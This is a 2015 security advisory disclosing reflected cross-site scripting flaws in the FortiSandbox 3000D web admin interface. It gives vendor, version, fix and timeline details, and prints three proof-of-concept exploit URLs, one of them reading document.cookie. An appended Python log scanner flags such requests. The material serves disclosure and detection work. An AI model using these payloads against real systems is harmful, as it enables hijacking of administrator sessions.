FortiSandbox 3000D 2.02 build0042 Cross Site Scripting

2015-08-01 00:00:00
hyp3rlinx
packetstormsecurity.com

EPSS: 0.003 (Low), Percentile: 69.1%

`[+] Credits: John Page aka hyp3rlinx  
  
[+] Website: hyp3rlinx.altervista.org  
  
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTISANDBOX-0801.txt  
  
  
Vendor:  
================================  
www.fortinet.com  
PSIRT ID: 1418018  
  
  
  
Product:  
==================================  
FortiSandbox 3000D v2.02 build0042  
  
  
Vulnerability Type:  
===================  
XSS  
  
  
  
CVE Reference:  
==============  
Pending  
  
  
  
Advisory Information:  
===========================================================================  
Multiple XSS vulnerabilities in FortiSandbox WebUI  
  
Impact  
  
A remote unauthenticated attacker may be able to execute arbitrary code in  
the security context of an authenticated user's browser session.  
  
Affected Products  
  
FortiSandbox 2.0.4 and lower.  
  
Solutions  
  
Upgrade to FortiSandbox 2.1 or above.  
  
  
  
Vulnerability Details:  
====================================================================  
http://www.fortiguard.com/advisory/FG-IR-15-019/  
http://www.fortiguard.com/advisory/2015-07-24-multiple-xss-vulnerabilities-in-fortisandbox-webui  
  
The Web User Interface of FortiSandbox version 2.0.4 and below contains  
multiple reflected Cross-Site Scripting (XSS) vulnerabilities.  
  
5 potential XSS vectors were identified:  
  
* Fortiview threats by users search filtered by serial  
* Fortiview threats by users search filtered by vdom  
* Export report feature in the Fortiview search page  
* Screenshot download generated by the VM scan feature  
* PCAP file download generated by the VM scan feature  
  
  
  
Exploit code(s):  
===============  
  
1)  
https://localhost/alerts/summary/profile/?prof_type=byusers-profile&from=byusers-filter&username=10.10.10.10&serial=<script>alert(666)</script><script>alert('XSS by hyp3rlinx 06012015')</script>&vdom=&from_time_period=1440#frag-1  
  
vulnerable parameter: "serial"  
------------------------------  
  
2)  
https://localhost/csearch/report/export/?urlForCreatingReport=<script>alert(666)</script><script>alert('XSS by hyp3rlinx June 1, 2015')</script>  
  
vulnerable parameter: "urlForCreatingReport"  
--------------------------------------------  
  
3)  
https://localhost/analysis/detail/download/screenshot?id="/><script>alert('XSS by hyp3rlinx June 1, 2015 '%2bdocument.cookie)</script>  
  
vulnerable parameter: "id"  
--------------------------  
  
  
  
Disclosure Timeline:  
========================================  
Vendor Notification: June 1, 2015  
Vendor Disclosure: July 24, 2015  
Public Disclosure: August 1, 2015  
  
Fixed In Firmware 2.1  
  
  
  
Discovery Status:  
=================  
Published  
  
  
  
Exploitation Technique:  
=======================  
Remote unauthenticated  
  
  
  
Severity Level:  
===============  
Medium  
  
  
  
Description:  
=====================================================================  
  
  
Request Method(s): [+] GET  
  
  
Vulnerable Product: [+] FortiSandbox 3000D v2.02  
  
  
Vulnerable Parameter(s): [+] serial, urlForCreatingReport, id  
  
  
Affected Area(s): [+] FortiSandbox Web Admin UI  
  
  
=====================================================================  
  
[+] Disclaimer  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.  
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.  
  
by hyp3rlinx`
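Added example, not part of the advisory above: a log-scanning check that flags GET requests to the three FortiSandbox WebUI endpoints the advisory names when the reflected parameter (`serial`, `urlForCreatingReport`, `id`) carries HTML or script markup, including double-URL-encoded payloads. The log format, hosts, serial and ids are constructed assumptions, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint path -> parameter the advisory lists as reflected without encoding.
VULN_PARAMS = {
    "/alerts/summary/profile/": "serial",
    "/csearch/report/export/": "urlForCreatingReport",
    "/analysis/detail/download/screenshot": "id",
}

# Markup that has no place in a serial number, report URL or record id.
MARKUP = re.compile(r"<\s*/?[a-z][a-z0-9]*|javascript:|\bon[a-z]+\s*=", re.I)

# Common-log-style line (assumed format): client host, "METHOD target HTTP/x", status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def inspect_request(target):
    """Return (param, decoded_value) when the request hits a listed endpoint
    with markup in its vulnerable parameter, otherwise None."""
    parts = urlsplit(target)
    param = VULN_PARAMS.get(parts.path)
    if param is None:
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        decoded = unquote(value)  # parse_qs decoded once; this catches double encoding
        if MARKUP.search(decoded):
            return param, decoded
    return None

def scan_log(lines):
    """Return [(client, path, param, decoded_value)] for every suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        found = inspect_request(m.group("target"))
        if found:
            hits.append((m.group("client"), urlsplit(m.group("target")).path) + found)
    return hits

# Constructed sample lines (placeholder hosts, serial and ids; not captured traffic).
SAMPLE_LOG = [
    '203.0.113.5 - admin [01/Aug/2015:10:00:01 +0000] "GET /alerts/summary/profile/?prof_type=byusers-profile&serial=FSA-PLACEHOLDER-0001&vdom= HTTP/1.1" 200',
    '203.0.113.5 - admin [01/Aug/2015:10:00:02 +0000] "GET /alerts/summary/profile/?prof_type=byusers-profile&serial=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200',
    '198.51.100.9 - - [01/Aug/2015:10:00:03 +0000] "GET /analysis/detail/download/screenshot?id=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200',
    '198.51.100.9 - - [01/Aug/2015:10:00:04 +0000] "GET /csearch/report/export/?urlForCreatingReport=https://example.invalid/report/42 HTTP/1.1" 200',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("suspicious:", hit)
```

The second and third sample lines are flagged; the placeholder serial and the plain report URL are not.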
